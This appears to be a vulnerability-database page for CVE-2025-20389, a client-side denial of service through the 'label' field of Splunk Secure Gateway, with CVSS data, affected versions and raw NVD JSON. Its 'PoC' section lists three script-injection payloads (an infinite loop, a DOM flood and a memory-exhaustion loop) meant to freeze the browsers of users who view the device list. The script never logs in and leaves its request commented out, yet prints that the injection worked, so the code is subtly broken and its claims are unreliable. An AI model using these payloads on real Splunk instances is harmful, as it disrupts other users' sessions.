Security Vulnerability Report
中文
CVE-2025-20389 CVSS 4.3 MEDIUM

CVE-2025-20389

Published: 2025-12-03 17:15:52
Last Modified: 2025-12-05 17:05:58
Source: [email protected]

Description

In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and versions below 3.9.10, 3.8.58 and 3.7.28 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the `label` column field after adding a new device in the Splunk Secure Gateway app. This could potentially lead to a client-side denial of service (DoS).

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - VULNERABLE
Splunk Enterprise < 9.2.10
Splunk Enterprise < 9.3.8
Splunk Enterprise < 9.4.6
Splunk Enterprise < 10.0.2
Splunk Secure Gateway App (Cloud) < 3.7.28
Splunk Secure Gateway App (Cloud) < 3.8.58
Splunk Secure Gateway App (Cloud) < 3.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Splunk CVE-2025-20389 PoC - Malicious label payload injection # Target: Splunk Secure Gateway App TARGET_URL = "https://target-splunk.com:8089" USERNAME = "low_privilege_user" PASSWORD = "password123" def exploit_cve_2025_20389(): """ This PoC demonstrates the client-side DoS via malicious label field injection. The payload causes browser crash when viewing the device list. """ # Login to Splunk session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } # Malicious payload for label field # This payload causes infinite loop and browser freeze malicious_payloads = [ # Payload 1: Infinite loop causing DoS '<img src=x onerror="while(true){console.log(1)};">', # Payload 2: DOM manipulation exhaustion '<script>setInterval(function(){document.body.innerHTML+="<div>text</div>"},1)</script>', # Payload 3: Memory exhaustion via string concatenation '<script>var s="";while(true){s+=new Array(100000).join("X")}</script>' ] # Add device with malicious label for payload in malicious_payloads: device_data = { "name": "MaliciousDevice", "label": payload, # Injected malicious payload "type": "generic" } # Send request to add device (requires low privilege) # POST /en-US/splunksecuregateway/devices headers = { "Content-Type": "application/json", "X-Splunk-Form-Key": session.cookies.get_dict().get('splunkd_key', '') } # response = session.post( # f"{TARGET_URL}/en-US/splunksecuregateway/devices", # json=device_data, # headers=headers # ) print(f"[*] Payload injected: {payload[:50]}...") print("[*] PoC completed - victims viewing device list will experience DoS") return True if __name__ == "__main__": exploit_cve_2025_20389()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20389", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.610", "lastModified": "2025-12-05T17:05:57.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and versions below 3.9.10, 3.8.58 and 3.7.28 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could craft a malicious payload through the `label` column field after adding a new device in the Splunk Secure Gateway app. This could potentially lead to a client-side denial of service (DoS)."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a la 10.0.2, 9.4.6, 9.3.8 y 9.2.10, y en las versiones anteriores a la 3.9.10, 3.8.58 y 3.7.28 de la aplicación Splunk Secure Gateway en Splunk Cloud Platform, un usuario con privilegios bajos que no posee los roles de Splunk 'admin' o 'power' podría crear una carga útil maliciosa a través del campo de columna 'label' después de añadir un nuevo dispositivo en la aplicación Splunk Secure Gateway. Esto podría conducir potencialmente a una denegación de servicio (DoS) del lado del cliente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.120", "matchCriteriaId": "B6CA3000-9C26-45B9-A2A2-C22F3F4246BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.8", "matchCriteriaId": "D269788F-7244-4307-B551-C1B943EF2BB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.6", "matchCriteriaId": "C54FA9B3-9E2A-4D99-8432-C39D3EC79507"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_secure_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.7.0", "versionEndExcluding": "3.7.28", "matchCriteriaId": "6947693D-3CE8-4C49-A1AB-94F8E6AEA562"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_secure_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.8.0", "versionEndExcluding": "3.8.58", "matchCriteriaId": "0583DB2E-A07E-4A14-8AA4-D9111F0F878C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_secure_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9.0", "versionEndExcluding": "3.9.10", "matchCriteriaId": "C38430AA-336A-432E-AD40-78CBB5F4DC30"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1208", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.